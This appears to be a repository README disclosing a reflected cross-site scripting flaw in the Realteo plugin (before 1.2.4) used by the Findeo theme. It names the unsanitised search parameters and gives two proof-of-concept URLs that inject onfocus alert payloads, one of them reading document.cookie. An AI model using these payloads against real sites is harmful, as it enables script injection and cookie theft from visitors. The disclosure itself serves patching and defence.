.. | |||
README.md | Loading last commit info... |
README.md
Realteo < 1.2.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Description
The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page, leading to an unauthenticated reflected Cross-Site Scripting issue.
Proof of Concept
https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);//%22
https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22